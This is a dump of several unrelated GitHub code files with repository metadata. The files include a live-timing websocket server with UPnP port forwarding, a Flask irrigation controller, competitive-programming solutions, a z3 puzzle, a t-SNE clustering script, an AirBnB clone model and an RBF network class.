service._publishRaceState()\n if service.analyser:\n service.analyser.publish_all()\n\n def connectionLost(self, reason):\n WebSocketServerProtocol.connectionLost(self, reason)\n self.factory.unregister(self)\n service.log.info(\n 'Client {peer} disconnected 
(remaining={remaining})',\n peer=self.peer,\n remaining=len(self.factory.clients)\n )\n\n return StandaloneServiceProtocol\n\n\nclass StandaloneSession(object):\n def __init__(self, service, port_callback=None, use_upnp=False):\n self._protocol = make_protocol(service)\n self._port_callback = port_callback\n self.service = service\n self.use_upnp = use_upnp\n\n def run(self):\n factory = BroadcastServerFactory()\n factory.protocol = self._protocol\n self.service.set_publish(factory.publish)\n\n port = int(os.environ.get('LIVETIMING_STANDALONE_PORT', 0))\n\n listening_port = reactor.listenTCP(port, factory)\n actual_port = listening_port.getHost().port\n\n upnp_forwarded_port, upnp = None, None\n\n if self._port_callback:\n self._port_callback(actual_port)\n\n should_use_upnp = self.use_upnp or os.environ.get('LIVETIMING_USE_UPNP', False)\n\n if should_use_upnp and upnpy:\n try:\n upnp_forwarded_port, uservice = self.upnp_forward_port(actual_port)\n except Exception:\n self.service.log.failure(\n 'UPnP forwarding failed! Manually forward port {port} on'\n ' your router to make the data externally accessible.',\n port=actual_port\n )\n elif should_use_upnp:\n self.service.log.warn(\n 'UPnP port forwarding requested but upnpy is not'\n ' available. Please manually configure port forwarding.'\n )\n\n txaio.start_logging()\n reactor.run()\n\n if upnp_forwarded_port and uservice:\n uservice.DeletePortMapping(\n NewRemoteHost='',\n NewProtocol='TCP',\n NewExternalPort=upnp_forwarded_port\n )\n self.service.log.info('Removed UPnP port forward for port {port}', port=upnp_forwarded_port)\n\n def upnp_forward_port(self, port):\n u = upnpy.UPnP()\n devices = u.discover()\n\n if len(devices) > 0:\n igd = u.get_igd()\n\n for uservice in igd.get_services():\n if uservice.type_ == 'WANIPConnection':\n ext_ip = uservice.GetExternalIPAddress()['NewExternalIPAddress']\n int_ip = get_local_ip()\n external_port, needs_creating = find_nearest_free_port(port, uservice, int_ip)\n\n if needs_creating:\n uservice.AddPortMapping(\n NewRemoteHost='',\n NewExternalPort=external_port,\n NewProtocol='TCP',\n NewInternalPort=port,\n NewInternalClient=int_ip,\n NewEnabled=1,\n NewPortMappingDescription='Timing71 standalone service port forward',\n NewLeaseDuration=0\n )\n else:\n self.service.log.info('Reusing exising UPnP port forwarding')\n\n self.service.log.info(\n '*** This service is accessible at {host} port {port} ***',\n host=ext_ip,\n port=external_port\n )\n\n return external_port, uservice\n raise Exception('Unable to find a UPnP service to configure port forwarding')\n\n else:\n self.service.log.warn('UPnP forwarding requested but no UPnP router found!')\n\n\ndef find_nearest_free_port(port, uservice, int_ip):\n eport = port\n needs_creating = True\n\n r = get_tcp_mapping_for_port(eport, uservice)\n while r is not None and eport < 65536:\n if r['NewInternalClient'] == int_ip:\n # We've discovered a stale UPnP forward from a previous incarnation\n # Let's reuse it\n needs_creating = False\n break\n eport = eport + 1\n r = get_tcp_mapping_for_port(eport, uservice)\n return eport, needs_creating\n\n\ndef get_tcp_mapping_for_port(port, uservice):\n try:\n return uservice.GetSpecificPortMappingEntry(\n NewProtocol='TCP',\n NewRemoteHost='',\n NewExternalPort=port\n )\n except Exception:\n return None\n\n\ndef get_local_ip():\n s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n s.connect((\"8.8.8.8\", 80))\n my_ip = s.getsockname()[0]\n s.close()\n return 
my_ip\n","repo_name":"timing71/livetiming-core","sub_path":"src/livetiming/service/standalone.py","file_name":"standalone.py","file_ext":"py","file_size_in_byte":6264,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"72"} +{"seq_id":"32159818174","text":"from collections import deque\r\n\r\nn, m = map(int,input().split())\r\n\r\ngraph = []\r\nfor i in range(n):\r\n graph.append(list(map(int,input().split())))\r\ndx = (0,0,-1,1,1,1,-1,-1)\r\ndy = (1,-1,0,0,-1,1,1,-1)\r\ncnt = 0\r\n\r\ndef bfs(i,j):\r\n q = deque()\r\n graph[i][j] = 0\r\n q.append((i,j))\r\n while q:\r\n x, y = q.popleft()\r\n for i in range(8):\r\n nx = dx[i] + x\r\n ny = dy[i] + y\r\n if 0 <= nx < n and 0 <= ny < m:\r\n if graph[nx][ny] == 1:\r\n graph[nx][ny] = 0\r\n q.append((nx,ny))\r\nfor i in range(n):\r\n for j in range(m):\r\n if graph[i][j] == 1:\r\n bfs(i,j)\r\n cnt += 1\r\n \r\nprint(cnt)","repo_name":"wnsgml7267/cote-practice","sub_path":"백준/Silver/14716. 현수막/현수막.py","file_name":"현수막.py","file_ext":"py","file_size_in_byte":720,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"18759373359","text":"# Projeto de Agente Inteligente\n# Objetivo: Agente deve coletar items no cenário\n# Autor: Danilo\n\n# Código baseado em: \n# The Nature of Code\n# Daniel Shiffman\n# http://natureofcode.com\n\n# Implements Craig Reynold's autonomous steering behaviors\n# One vehicle \"seeks\"\n# See: http://www.red3d.com/cwr/\n\nfrom Agente import Agente\nfrom Item import Item\n\n#################################################\n# Este código representa o ambiente onde o agente\n# deve atuar.\n#\n# Configuração inicial do ambiente:\n# 1 Agente\n# 1 Item \n#################################################\ndef setup():\n global agente\n global item \n \n # tamanho da tela\n size(800, 400)\n \n # criando agente na tela (triângulo)\n agente = Agente(width / 2, height / 2)\n \n # Criando objeto item. \n # Um item inicial é criado de forma automática. 
\n    item = Item()\n    \n\n#################################################\n# Environment execution loop\n#################################################\ndef draw():\n    background(255)\n    \n    # Add the item to the current environment.\n    #item.posicionar(item.item_atual)\n    item.posicionar()\n    \n    # The agent must search for the item on screen.\n    agente.procurar(item.item_atual)\n\n    # Check whether the agent reached its goal.\n    # If the goal is reached, the system must\n    # create a new item in the environment.\n    if agente.encontrou(item.item_atual):\n        item.item_atual = item.criar_novo()\n        agente.itens_encontrados += 1\n        print(\"Total de itens encontrados:\", agente.itens_encontrados)\n    \n    # Update the agent in the environment.\n    agente.update()\n    agente.display()\n    \n    \ndef adicionar(item):\n    # Configure the item\n    fill(127)\n    stroke(200)\n    strokeWeight(2)\n    \n    # Draw the item as an ellipse\n    circle(item.x, item.y, item.z)\n","repo_name":"ryganon/projetos_IAI","sub_path":"Agente_Inteligente_Coletor/Agente_Inteligente_Coletor.pyde","file_name":"Agente_Inteligente_Coletor.pyde","file_ext":"pyde","file_size_in_byte":1868,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
{"seq_id":"20750373986","text":"#!/usr/bin/python3\n# -*- coding: utf-8 -*-\n\nimport argparse, sys, time, os, json, datetime, string, random, traceback\nfrom flask import Flask, render_template, request, session, redirect, abort, send_file, make_response\nfrom flask_cors import CORS\n\nimport DAO\n\nclass Config(object):\n\tSECRET_KEY = ''\n\talphabet = string.ascii_letters + string.digits + string.punctuation\n\tfor i in range(32):\n\t\tSECRET_KEY += ''.join(random.choice(alphabet))\n\tSESSION_PERMANENT = False\n\napp = Flask(__name__)\nCORS(app)\napp.config.from_object(Config())\n\ndao = DAO.DAO(\"db\", 3306, \"IRRIGATRON\", \"IRRIGATRON\", \"IRRIGATRON\", debug=True)\n#dao = DAO.DAO(\"127.0.0.1\", 3306, \"IRRIGATRON\", \"IRRIGATRON\", \"IRRIGATRON\", debug=True)\ndao.init()\n\nmust_water = {}\n\n### HOME ###\n@app.route('/test', methods=['GET'])\ndef test():\n\tresponse = {'message': 'OK'}\n\treturn make_response(json.dumps(response), 200)\n\n### HOME ###\n@app.route('/', methods=['GET'])\n@app.route('/home', methods=['GET'])\ndef home():\n\tplants = dao.getPlants()\n\treturn render_template('home.html', plants=plants)\n\n@app.route('/new_plant', methods=['POST'])\ndef newPlant():\n\tdata = request.form\n\tprint(data)\n\tplant = DAO.PlantDTO(data[\"name\"], data[\"description\"], data[\"pump\"], data[\"tank_height\"])\n\t\n\tif(len(dao.getPlants()) >= 
8):\n\t\tprint(\"cannot create a new plant\")\n\telse:\n\t\tdao.updatePlant(plant)\n\n\treturn redirect('/home')\n\n@app.route('/plant/<plant_name>', methods=['GET'])\ndef homePlant(plant_name):\n\tplant = dao.getPlantByName(plant_name)\n\tplants = dao.getPlants()\n\t\n\tinner_keys = dao.getInnerKeys()\n\tprint(inner_keys)\n\n\tplant_data = dao.getDatasByPlant(plant)\n\n\tgroups = {}\n\tfor group in dao.getConditionsByPlant(plant):\n\t\tif str(group.group) not in groups.keys():\n\t\t\tgroups[str(group.group)] = []\n\n\t\tgroups[str(group.group)].append(group)\n\n\tprint(groups.keys())\n\n\tcondition_groups = []\n\n\tfor condition in groups.keys():\n\t\tcondition_groups.append({\"id\":condition, \"conditions\":groups[condition]})\n\n\tinner_keys.append(\"time\")\t## add time as an inner key\n\n\tlast_tank_height = dao.getLastDatasByPlant(plant, \"tank_height\")\n\tprint(last_tank_height)\n\tif len(last_tank_height) == 0:\n\t\tlast_tank_height = 0\n\telse:\n\t\tlast_tank_height = float(last_tank_height[0].value)\n\n\twater_history = []\n\tfor watering in dao.getWateringsByPlant(plant):\n\t\twater_history.append(watering.timestamp)\n\t\t\n\tprint(water_history)\n\n\treturn render_template('plant.html', plant=plant, plants=plants, water_history=water_history, inner_keys=inner_keys, plant_data=plant_data, condition_groups=condition_groups, tank_height=last_tank_height)\n\n@app.route('/plant/<plant_name>/force_water', methods=['POST'])\ndef forceWater(plant_name):\n\tmust_water[plant_name] = True\n\tprint(must_water[plant_name])\n\n\treturn redirect('/plant/{}'.format(plant_name))\n\n@app.route('/plant/<plant_name>/update_keys', methods=['POST'])\ndef updateKeys(plant_name):\n\tplant = dao.getPlantByName(plant_name)\n\tplants = dao.getPlants()\n\n\tdata = request.form\n\tprint(data)\n\n\tinner_keys = []\n\tfor e in data.keys():\n\t\tinner_keys.append(e)\n\tplant.inner_keys = ','.join(inner_keys)\n\tdao.updatePlant(plant)\n\n\treturn redirect('/plant/{}'.format(plant_name))\n\n\n@app.route('/plant/<plant_name>/new_condition', methods=['POST'])\ndef newCondition(plant_name):\n\tplant = dao.getPlantByName(plant_name)\n\tplants = dao.getPlants()\n\t\n\tdata = request.form\n\tprint(data)\n\n\tcondition = DAO.ConditionDTO(plant, data[\"group_id\"], data[\"key\"], data[\"condition\"], data[\"value\"])\n\n\tdao.updateCondition(condition)\n\n\treturn redirect('/plant/{}'.format(plant_name))\n\n@app.route('/plant/<plant_name>/delete_condition', methods=['POST'])\ndef deleteCondition(plant_name):\n\tplant = dao.getPlantByName(plant_name)\n\tplants = dao.getPlants()\n\t\n\tdata = request.form\n\tprint(data)\n\n\tcondition = DAO.ConditionDTO(plant, data[\"group_id\"], data[\"key\"])\n\n\tdao.deleteCondition(condition)\n\n\treturn redirect('/plant/{}'.format(plant_name))\n\n\n## ARDUINO ###\n@app.route('/upload', methods=['POST'])\ndef upload():\n\tdata = request.get_json()\n\n\tprint(data);\n\n\tif \"datas\" in data.keys():\n\t\tfor d in data[\"datas\"]:\n\t\t\tinner_key = list(d.keys())[0]\n\t\t\tinner_value = d[inner_key]\n\t\t\tdata_dto = DAO.DataDTO(timestamp=int(time.time()), key=inner_key, value=inner_value)\n\t\t\tdao.updateData(data_dto)\n\n\t\tresponse = {'message': 'Data OK'}\n\t\treturn make_response(json.dumps(response), 201)\n\telse:\n\t\tresponse = {'message': 'datas is mandatory'}\n\t\treturn make_response(json.dumps(response), 400)\n\n@app.route('/watering', methods=['POST'])\ndef watering():\n\tdata = request.get_json()\n\n\tprint(data);\n\n\tfor key in data.keys():\n\n\t\tif data[key] == '1':\n\t\t\ttry:\n\t\t\t\tplant = 
dao.getPlantByPump(int(key.replace(\"pump\", \"\")))\n\t\t\t\tif plant != None:\n\t\t\t\t\twatering = DAO.WateringDTO(plant, timestamp=int(time.time()))\n\t\t\t\t\tprint(\"new watering\")\n\t\t\t\t\tdao.createWatering(watering)\n\t\t\texcept:\n\t\t\t\tpass\n\n\tresponse = {'message': 'Data OK'}\n\treturn make_response(json.dumps(response), 201)\n\t\n\n@app.route('/water', methods=['POST'])\ndef water():\n\tdata = request.get_json()\n\n\tprint(data);\n\n\tpump_states = {\"pump0\":False, \"pump1\":False, \"pump2\":False, \"pump3\":False, \"pump4\":False, \"pump5\":False, \"pump6\":False, \"pump7\":False}\n\tfor index,key in enumerate(pump_states.keys()):\n\t\tplant = dao.getPlantByPump(index)\n\t\tif plant != None:\n\t\t\tif plant.name in must_water.keys() and must_water[plant.name] == True:\n\t\t\t\tprint(\"force watering\")\n\t\t\t\tmust_water[plant.name] = False\n\t\t\t\tpump_states[key] = True\n\t\t\t\t\n\t\t\telse:\n\t\t\t\tconditions = dao.getConditionsByPlant(plant)\n\n\t\t\t\tconditions.sort(key=lambda x: x.group)\n\n\t\t\t\tgroups = {}\n\t\t\t\tfor condition in conditions:\n\t\t\t\t\tif str(condition.group) not in groups.keys():\n\t\t\t\t\t\tgroups[str(condition.group)] = []\n\t\t\t\t\tgroups[str(condition.group)].append(condition)\n\n\t\t\t\tfor group_key in groups.keys():\n\t\t\t\t\tcondition_true_counter = 0\n\n\t\t\t\t\tfor condition in groups[group_key]:\n\t\t\t\t\t\tprint(condition.key, condition.value)\n\t\t\t\t\t\tif condition.key != \"time\":\n\t\t\t\t\t\t\tlast_datas = dao.getLastDatasByPlant(plant, condition.key)\n\t\t\t\t\t\t\tif last_datas != None and len(last_datas) > 0:\n\t\t\t\t\t\t\t\tlast_data = last_datas[0].value\n\t\t\t\t\t\t\t\tprint(last_data)\n\t\t\t\t\t\t\t\tif ((condition.condition == \"higher\" and last_data > condition.value)\n\t\t\t\t\t\t\t\t\tor (condition.condition == \"lower\" and last_data < condition.value)):\n\t\t\t\t\t\t\t\t\tcondition_true_counter += 1\n\t\t\t\t\t\t\t\t\tprint(\"esta es true\")\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tnow = datetime.datetime.now().time()\n\t\t\t\t\t\t\ttime_in_condition = str(condition.value).split(\".\")\n\t\t\t\t\t\t\tif len(str(condition.value).split(\".\")) == 1:\n\t\t\t\t\t\t\t\ttime_in_condition.append(0)\n\t\t\t\t\t\t\ttime_in_condition[0] = int(time_in_condition[0])\n\t\t\t\t\t\t\ttime_in_condition[1] = int(time_in_condition[1])\n\n\t\t\t\t\t\t\tif ((condition.condition == \"higher\" and now.hour >= time_in_condition[0] and now.minute > time_in_condition[1])\n\t\t\t\t\t\t\t\tor (condition.condition == \"lower\" and now.hour <= time_in_condition[0] and now.minute < time_in_condition[1])):\n\t\t\t\t\t\t\t\tcondition_true_counter += 1\n\n\t\t\t\t\tprint(condition_true_counter)\n\t\t\t\t\tif condition_true_counter >= len(groups[group_key]):\n\t\t\t\t\t\tpump_states[key] = True\n\t\n\tprint(json.dumps(pump_states))\n\treturn make_response(json.dumps(pump_states), 200)\n\t\n\n#app.run(host=host, debug=True, port=sqlete_defaults.http_port, ssl_context=(sqlete_defaults.sqlete_framework_path+'/sqlete/certs/cert.pem', sqlete_defaults.sqlete_framework_path+'/sqlete/certs/key.pem'))\napp.run(host=\"0.0.0.0\", debug=True, port=5000)","repo_name":"migue27au/IrrigaTRON","sub_path":"server/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":7343,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
{"seq_id":"28603845311","text":"def main():\n    cases = int(input())\n\n    for case in range(cases):\n        position = int(input())\n        fibb = [0,1]\n        cur = 1\n        def 
goToPosOnFib(pos,current):\n if pos < 3:\n return f'{pos} = {fibb[pos-1]}'\n elif current == pos-1:\n return None\n fibb.append(fibb[current] + fibb[current-1])\n goToPosOnFib(pos,current+1)\n goToPosOnFib(position, cur)\n print(f'{position} = {fibb[position-1]}')\n\nif __name__ == '__main__':\n main()","repo_name":"Chenzo46/Coding-problems","sub_path":"fibbonacci.py","file_name":"fibbonacci.py","file_ext":"py","file_size_in_byte":532,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"71337172394","text":"\"\"\"\nSolve the multiplication puzzle:\n\n x02\n y9\nx------\n 1abc8\n\n\"\"\"\nimport z3\n\n\nif __name__ == '__main__':\n solver = z3.Solver()\n\n x, y, a, b, c = z3.Ints('x y a b c')\n sym_digits = (x, y, a, b, c)\n digit_constraints = [z3.And(0 <= s, s <= 9) for s in sym_digits]\n\n multiplicant1 = 100*x + 2\n multiplicant2 = 10*y + 9\n product = 10000 + 100*a + 10*b + 8\n\n solver.add(product == multiplicant1 * multiplicant2, *digit_constraints)\n result = solver.check()\n if result == z3.sat:\n model = solver.model()\n m1 = 100*model[x].as_long() + 2\n m2 = 10*model[y].as_long() + 9\n print(f\"{m1} x {m2} = {m1*m2}\")\n else:\n print(\"No solution\")\n","repo_name":"benjaminfjones/toy-puzzles","sub_path":"src/ingrid_digit_puzzle/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":702,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"15033626339","text":"class Vector(object):\r\n def __init__(self, pos1, pos2):\r\n self.point1 = pos1\r\n self.point2 = pos2\r\n self.size_x = pos2[0] - pos1[0]\r\n self.size_y = pos2[1] - pos1[1]\r\n\r\n def get_cross(self, other: \"Vector\"):\r\n return self.size_x * other.size_y - self.size_y * other.size_x\r\n\r\n def check_crossing(self, other: \"Vector\"):\r\n vec1, vec2 = Vector(self.point1, other.point1), Vector(self.point1, other.point2)\r\n vec3, vec4 = Vector(other.point1, self.point1), Vector(other.point1, self.point2)\r\n return self.get_cross(vec1) * self.get_cross(vec2) < 0 and \\\r\n other.get_cross(vec3) * other.get_cross(vec4) < 0\r\n\r\n\r\nif __name__ == \"__main__\":\r\n pos = list(map(int, input().split()))\r\n line = Vector(pos[0:2], pos[2:])\r\n N = int(input())\r\n a = [list(map(int, input().split())) for _ in [0]*N]\r\n a += [a[0]]\r\n count = 0\r\n\r\n for p1, p2 in zip(a, a[1:]):\r\n if Vector(p1, p2).check_crossing(line):\r\n count += 1\r\n\r\n print(count//2 + 1)","repo_name":"Kawser-nerd/CLCDSA","sub_path":"Source Codes/AtCoder/abc016/D/3519247.py","file_name":"3519247.py","file_ext":"py","file_size_in_byte":1039,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"72"} +{"seq_id":"21407000476","text":"import numpy as np\nimport matplotlib.pyplot as plt \nfrom sklearn import datasets\nfrom sklearn.decomposition import PCA\nfrom sklearn.manifold import TSNE\nfrom sklearn.cluster import DBSCAN\nfrom preprocessing import read_data, path_to_batches, get_filenames, load_data\nfrom networks.play_lmp import PlayLMP\nimport utils.constants as constants\nimport os \nimport cv2\n\ndef load_paths():\n valid_filenames = [ \"friday_microwave_topknob_bottomknob_slide_%d_path\"%i for i in [3,6,8,9,11] ]\n data_filenames = [ \"./data/validation/%s.pkl\"%data_file for data_file in valid_filenames ]\n paths = load_data(data_filenames)\n return paths\n\ndef save_imgs(labels, images, skip_frames=0, save_dir =\"./analysis/recognition_clusters/\"):\n #images = [batch, 
seq_len, 3, 300, 300]\n for label in range(labels.max()+1): # ignore outliers since starts at 0\n cluster_imgs = images[labels == label] # All sequences in the same cluster\n save_inds = np.random.choice(cluster_imgs.shape[0], 25) # Select 25 rand imgs to save\n save_imgs = np.transpose(cluster_imgs[save_inds], (0,1,3,4,2)) # Order channels for CV2 save (25, seq_len, 300, 300, 3)\n\n #Save each sequence as a single image\n save_imgs = tuple(save_imgs[:, i] for i in range(0, save_imgs.shape[1], skip_frames+1))\n save_imgs = np.concatenate(save_imgs, axis=2) # (25, 300, 600, 3), append to width\n\n #save_directory\n dirname = save_dir + \"cluster_%d/\" % label\n if not os.path.exists(dirname):\n os.makedirs(dirname)\n for ind, img in enumerate(save_imgs, 1): \n save_path = \"%simg_%d.png\" % (dirname, ind)\n cv2.imwrite(save_path, cv2.cvtColor(img, cv2.COLOR_RGB2BGR)) #save as blue shelfs\n\ndef temporal_tsne(model_path):\n save_dir = \"./analysis/temporal_tsne/\"\n save_name = \"clusters\"\n n_mix = 10\n use_logistics = True\n show = False\n\n #Initialize model\n model = PlayLMP(num_mixtures=n_mix, use_logistics=use_logistics)\n model.load(model_path)\n\n #Load data \n paths = load_paths()\n #Transform data into plans\n X = []\n path_lengths = []\n all_images = []\n for path in paths:\n path_plans = []\n data_obs, data_imgs, _ = path_to_batches(path, window_size=32, batch_size=64, validation=True)\n for j in range(len(data_obs)):\n plans_batch = model.get_pp_plan(data_obs[j], data_imgs[j]).detach().cpu().numpy()\n path_plans.append(plans_batch)\n path_plans = np.concatenate(path_plans, axis=0)\n path_lengths.append(path_plans.shape[0])\n X.append(path_plans)\n all_images.append(np.concatenate(data_imgs, axis=0))\n all_images = np.concatenate(all_images, axis=0)\n\n #Find clusters\n X = np.concatenate(X, axis=0)\n X = PCA(n_components=50, random_state=1).fit_transform(X) #(batch, 50)\n X = TSNE(n_components=2, random_state=1).fit_transform(X) #(batch, 2)\n clusters = DBSCAN(eps=2, min_samples=5)\n labels = clusters.fit_predict(X)\n print(labels)\n #Temporal visualization of clusters\n c = 0\n for idx, path_length in enumerate(path_lengths):\n aux_labels = labels[c : c + path_length]\n plt.scatter(np.arange(path_length), np.zeros(path_length) + idx, c=aux_labels, cmap=\"nipy_spectral\")\n c += path_length\n\n #Plot visuals\n plt.suptitle(\"Temporal Analysis\")\n plt.title(\"Microwave - Topknob - Bottomknob - Slide\")\n for spine in plt.gca().spines.values():\n spine.set_visible(False)\n plt.gca().get_yaxis().set_visible(False)\n if(show):\n plt.show()\n\n #Save temporal plot\n if not os.path.exists(save_dir):\n os.makedirs(save_dir)\n plt.savefig(\"%s%s.png\"%(save_dir, \"Temporal\"), dpi=100) #save cluster images\n\n #Plot clusters\n fig, ax = plt.subplots()\n scatter = ax.scatter(X[:,0], X[:,1], c=labels, cmap=\"nipy_spectral\")\n fig.suptitle(\"Latent space\")\n ax.axis('off')\n \n # Plot legends\n fig_legends, ax_legends = plt.subplots(figsize = (3,10))\n n_classes = np.unique(labels)\n legend1 = ax_legends.legend(*scatter.legend_elements(num = n_classes ), title=\"Classes\", loc='center')\n ax_legends.add_artist(legend1)\n\n #save in analysis/tsne\n if not os.path.exists(save_dir):\n os.makedirs(save_dir)\n fig.savefig(\"%s%s.png\"%(save_dir,save_name), dpi=100) #save cluster images\n fig_legends.savefig(\"%s%s_labels.png\"%(save_dir,save_name), dpi=100) #save legends\n\n if(show):\n plt.show()\n \n data_imgs = np.concatenate(data_imgs, axis=0) # batch_size , seq_len, img_size\n return 
labels, all_images\n\nif __name__ == '__main__':\n    cluster_labels, seq_imgs = temporal_tsne(model_path=\"./models/10_logistic_multitask_bestacc_new.pth\")\n    save_imgs(cluster_labels, seq_imgs, save_dir =\"./analysis/temporal_tsne/proposal_clusters/\")\n","repo_name":"ErickRosete/Robot-Skills-from-Video","sub_path":"temporal_tsne_analysis.py","file_name":"temporal_tsne_analysis.py","file_ext":"py","file_size_in_byte":4829,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"}
{"seq_id":"16985985386","text":"#!/usr/bin/python3\n\"\"\"Base class that defines all common attributes/methods for other classes\"\"\"\nimport uuid\nimport models\nfrom datetime import datetime\nfrom sqlalchemy import Column, Integer, String, DateTime\nfrom sqlalchemy.ext.declarative import declarative_base\n\n\nBase = declarative_base()\n\n\nclass BaseModel:\n    \"\"\"A base class for all hbnb models\"\"\"\n    id = Column(String(60), unique=True, nullable=False, primary_key=True)\n    created_at = Column(DateTime, nullable=False, default=(datetime.utcnow()))\n    updated_at = Column(DateTime, nullable=False, default=(datetime.utcnow()))\n\n    def __init__(self, *args, **kwargs):\n        \"\"\"Instantiates a new model\"\"\"\n        if kwargs:\n            for key, value in kwargs.items():\n                if key == \"created_at\" or key == \"updated_at\":\n                    value = datetime.strptime(value, \"%Y-%m-%dT%H:%M:%S.%f\")\n                if key != \"__class__\":\n                    setattr(self, key, value)\n            if \"id\" not in kwargs:\n                self.id = str(uuid.uuid4())\n            if \"created_at\" not in kwargs:\n                self.created_at = datetime.now()\n            if \"updated_at\" not in kwargs:\n                self.updated_at = datetime.now()\n        else:\n            self.id = str(uuid.uuid4())\n            self.created_at = self.updated_at = datetime.now()\n\n    def __str__(self):\n        \"\"\"Returns a string representation of the instance\"\"\"\n        return f\"[{type(self).__name__}] ({self.id}) {self.__dict__}\"\n\n    def __repr__(self):\n        \"\"\"Returns a string representation of the instance\"\"\"\n        return self.__str__()\n\n    def save(self):\n        \"\"\"Updates updated_at with current time when instance is changed\"\"\"\n        self.updated_at = datetime.now()\n        models.storage.new(self)\n        models.storage.save()\n\n    def to_dict(self):\n        \"\"\"Convert instance into dict format\"\"\"\n        my_dict = dict(self.__dict__)\n        my_dict[\"__class__\"] = str(type(self).__name__)\n        my_dict[\"created_at\"] = self.created_at.isoformat()\n        my_dict[\"updated_at\"] = self.updated_at.isoformat()\n        if '_sa_instance_state' in my_dict.keys():\n            del my_dict['_sa_instance_state']\n        return my_dict\n\n    def delete(self):\n        \"\"\"Deletes instance from storage\"\"\"\n        models.storage.delete(self)\n","repo_name":"benbiji/AirBnB_clone_v2","sub_path":"models/base_model.py","file_name":"base_model.py","file_ext":"py","file_size_in_byte":2323,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
{"seq_id":"15118011724","text":"try:\n    linux_interaction()\n    with open ('file.log') as file:\n        read_data = file.read()\n\nexcept FileNotFoundError as fnf_error:\n    print(fnf_error)\n\nexcept AssertionError as error:\n    print('Linux linux_interaction() function was not executed')","repo_name":"22Rish15/Python-1.1","sub_path":"Exception Handling/try and except_2.py","file_name":"try and except_2.py","file_ext":"py","file_size_in_byte":255,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"}
{"seq_id":"12916149976","text":"import csv\n\nimport numpy as np\n\n\nclass RBF:\n    W_matrix = V_matrix = radius = 
None\n LAMDA = 1\n\n def __init__(self, x=None, y=None, num_circles=0, is_regression=False, load_data=False):\n self.is_regression = is_regression\n if not load_data:\n self.X = x\n self.y = y\n self.NUM_FEATURES = x.shape[1]\n self.NUM_SAMPLES = x.shape[0]\n self.NUM_CIRCLE = num_circles\n else:\n self.W_matrix, self.V_matrix, self.radius = self.load_network()\n self.NUM_CIRCLE = self.radius.size\n\n\n\n def evaluate(self, individual):\n self.V_matrix = np.reshape(individual, (-1, self.NUM_FEATURES + 1))\n self.radius = self.V_matrix[:, 0]\n self.V_matrix = self.V_matrix[:, 1:]\n G_matrix = np.empty((self.NUM_SAMPLES, self.NUM_CIRCLE))\n for i in range(self.NUM_SAMPLES):\n for j in range(self.NUM_CIRCLE):\n G_matrix[i, j] = self.cal_g(self.radius[j], self.X[i], self.V_matrix[j])\n self.W_matrix = self.cal_W(G_matrix, self.y)\n y_star = np.matmul(G_matrix, self.W_matrix)\n if self.is_regression:\n loss = self.loss_regression(self.y, y_star)\n else:\n loss = self.loss_classification(self.y, y_star)\n return loss,\n\n def predict(self, individual):\n self.V_matrix = np.reshape(individual, (-1, self.NUM_FEATURES + 1))\n self.radius = self.V_matrix[:, 0]\n self.V_matrix = self.V_matrix[:, 1:]\n G_matrix = np.empty((self.NUM_SAMPLES, self.NUM_CIRCLE))\n for i in range(self.NUM_SAMPLES):\n for j in range(self.NUM_CIRCLE):\n G_matrix[i, j] = self.cal_g(self.radius[j], self.X[i], self.V_matrix[j])\n self.W_matrix = self.cal_W(G_matrix, self.y)\n y_star = np.matmul(G_matrix, self.W_matrix)\n if self.is_regression:\n return y_star\n else:\n # y_star = 1 / (1 + np.e ** -y_star)\n return np.argmax(y_star, axis=1)\n\n def validation(self, X, y):\n G_matrix = np.empty((X.shape[0], self.NUM_CIRCLE))\n for i in range(X.shape[0]):\n for j in range(self.NUM_CIRCLE):\n G_matrix[i, j] = self.cal_g(self.radius[j], X[i], self.V_matrix[j])\n self.W_matrix = self.cal_W(G_matrix, y)\n y_star = np.matmul(G_matrix, self.W_matrix)\n if self.is_regression:\n return y_star, self.loss_regression(y, y_star)\n else:\n # y_star = 1 / (1 + np.e ** -y_star)\n return np.argmax(y_star, axis=1), self.loss_classification(y, y_star)\n\n def cal_W(self, G, y):\n regulated_G = np.matmul(np.transpose(G), G) + self.LAMDA * np.eye(self.NUM_CIRCLE)\n inverse = np.matmul(np.linalg.inv(regulated_G), np.transpose(G))\n return np.matmul(inverse, y)\n\n def save_network(self):\n file = open(\"W_matrix.csv\", 'w')\n for i in range(self.W_matrix.shape[0]):\n for j in range(self.W_matrix.shape[1] - 1):\n file.write(str(self.W_matrix[i, j]))\n file.write(',')\n file.write(str(self.W_matrix[i, self.W_matrix.shape[1] - 1]))\n file.write('\\n')\n file.close()\n\n file = open(\"V_matrix.csv\", 'w')\n for i in range(self.V_matrix.shape[0]):\n for j in range(self.V_matrix.shape[1] - 1):\n file.write(str(self.V_matrix[i, j]))\n file.write(',')\n file.write(str(self.V_matrix[i, self.V_matrix.shape[1] - 1]))\n file.write('\\n')\n file.close()\n\n file = open(\"radius.csv\", 'w')\n for i in range(self.radius.shape[0] - 1):\n file.write(str(self.radius[i]))\n file.write(',')\n file.write(str(self.radius[self.radius.shape[0] - 1]))\n file.write('\\n')\n file.close()\n print(self.radius)\n print(self.W_matrix)\n print(self.V_matrix)\n\n def load_network(self):\n W_matrix = self.read_csv('W_matrix.csv')\n V_matrix = self.read_csv('V_matrix.csv')\n radius = self.read_csv('radius.csv')\n W_matrix = np.array(W_matrix)\n V_matrix = np.array(V_matrix)\n radius = np.array(radius)\n radius = radius[0]\n return W_matrix, V_matrix, radius\n\n @staticmethod\n def 
